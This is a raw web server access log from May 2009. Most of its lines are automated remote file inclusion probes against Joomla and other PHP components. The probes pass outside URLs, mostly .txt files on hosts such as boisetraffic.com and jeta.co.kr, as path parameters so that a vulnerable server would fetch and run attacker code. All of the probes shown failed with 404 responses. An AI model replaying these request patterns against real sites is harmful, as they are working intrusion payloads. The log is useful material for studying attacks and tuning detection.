219.85.63.226 - - [19/May/2009:04:31:51 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:51 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:51 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:51 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:51 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:51 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:52 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:52 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:52 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:56 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:56 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:56 -0400] "GET /logs/access_log.Q108110900%20%20//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:57 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:57 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:31:57 -0400] "GET /logs/access_log.Q108110900%20%20//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:32:44 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:32:44 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:32:44 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:04:33:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.142.171 - - [19/May/2009:04:32:29 -0400] "GET /logs/access_log.Q109051500 HTTP/1.0" 200 6117848 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.232.66.198 - - [19/May/2009:04:33:24 -0400] "GET /logs/access_log.Q108120600%20%20//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:33:26 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:33:26 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:33:26 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:33:27 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:33:27 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:33:27 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:33:46 -0400] "GET /logs/access_log.Q108120600%20%20//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:33:59 -0400] "GET /logs/access_log.Q108102400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:34:05 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:34:05 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:34:05 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.30.142.171 - - [19/May/2009:04:33:39 -0400] "GET /logs/access_log.Q109051800 HTTP/1.0" 200 5218469 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.143.98.5 - - [19/May/2009:04:34:08 -0400] "GET /logs/access_log.Q108112400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:34:35 -0400] "GET /logs/access_log.Q108120600//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:35:30 -0400] "GET /logs/access_log.Q108120600%20%20//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:35:33 -0400] "GET /logs/access_log.Q108120600%20%20//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:35:44 -0400] "GET /logs/access_log.Q108120600//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:35:59 -0400] "GET /logs/access_log.Q108120600//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
72.30.142.171 - - [19/May/2009:04:36:00 -0400] "GET /logs/access_log.Q108032800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
219.85.63.226 - - [19/May/2009:04:36:09 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:36:09 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:36:09 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:36:33 -0400] "GET /logs/access_log.Q108120600//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.72.114 - - [19/May/2009:04:37:28 -0400] "GET /logs/error_log.Q107080500 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
219.85.63.226 - - [19/May/2009:04:37:41 -0400] "GET //components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:37:41 -0400] "GET /logs/access_log.Q108110900//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:37:41 -0400] "GET /logs//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:37:53 -0400] "GET /logs/access_log.Q108120600//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:04:38:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.141.54.240 - - [19/May/2009:04:39:03 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:04:39:03 -0400] "GET /logs/access_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:04:39:03 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:39:49 -0400] "GET /logs/access_log.Q108120600//components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
217.18.76.16 - - [19/May/2009:04:39:51 -0400] "GET /logs/access_log.Q108052400//?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
62.141.54.240 - - [19/May/2009:04:40:11 -0400] "GET /logs/access_log.Q108080200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
62.141.54.240 - - [19/May/2009:04:40:11 -0400] "GET /logs/access_log.Q108061100%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:44 -0400] "GET //galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:44 -0400] "GET /logs//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:44 -0400] "GET //galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:44 -0400] "GET /logs//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:44 -0400] "GET /logs/access_log.Q108121900//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:44 -0400] "GET /logs/access_log.Q108121900//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:48 -0400] "GET //galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:48 -0400] "GET /logs/access_log.Q108121900//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:48 -0400] "GET /logs//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:48 -0400] "GET /logs/access_log.Q108120600//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:48 -0400] "GET //galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:48 -0400] "GET /logs//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:48 -0400] "GET /logs/access_log.Q108121900//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:40:48 -0400] "GET /logs/access_log.Q108120600//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:05 -0400] "GET //galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:05 -0400] "GET /logs//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:05 -0400] "GET /logs/access_log.Q108121900%20%20//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:05 -0400] "GET /logs/access_log.Q108120600%20%20//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:05 -0400] "GET //galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:05 -0400] "GET /logs/access_log.Q108121900%20%20//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:05 -0400] "GET /logs//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:05 -0400] "GET /logs/access_log.Q108120600%20%20//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:04:41:23 -0400] "GET /logs/access_log.Q109051200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:25 -0400] "GET //galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:25 -0400] "GET /logs/access_log.Q108112400//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:25 -0400] "GET /logs//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:25 -0400] "GET /logs/access_log.Q108102400//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:43 -0400] "GET /logs/access_log.Q108112400//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:43 -0400] "GET //galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:04:41:43 -0400] "GET /logs//galeria.php?start=0&kategoria=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
118.45.190.166 - - [19/May/2009:04:42:33 -0400] "GET /logs/access_log.Q108061100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt???? HTTP/1.1" 404 272 "-" "libwww-perl/5.65"
118.45.190.166 - - [19/May/2009:04:42:36 -0400] "GET /logs/access_log.Q108080200//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://80.24.176.145/time//appserv/file.txt???? HTTP/1.1" 404 272 "-" "libwww-perl/5.65"
208.64.202.134 - - [19/May/2009:04:42:42 -0400] "GET /logs/access_log.Q109051200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:42:47 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:42:47 -0400] "GET /logs/access_log.Q108090400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:42:47 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:42:53 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:42:53 -0400] "GET /logs/access_log.Q108090400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:42:53 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:42:55 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:42:56 -0400] "GET /logs/access_log.Q108090400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:42:56 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:42:57 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:42:57 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:42:57 -0400] "GET /logs/access_log.Q108090400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:04:43:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.85.63.226 - - [19/May/2009:04:43:12 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:43:12 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:43:12 -0400] "GET /logs/access_log.Q108090400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:43:14 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:43:14 -0400] "GET /logs/access_log.Q108090400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:43:14 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:43:37 -0400] "GET /logs/access_log.Q108090400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:43:37 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:43:37 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:43:48 -0400] "GET /logs/access_log.Q108090400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:43:48 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:43:48 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:43:56 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
77.232.66.198 - - [19/May/2009:04:43:57 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:44:29 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
219.85.63.226 - - [19/May/2009:04:44:41 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://boisetraffic.com/cnr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:04:48:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
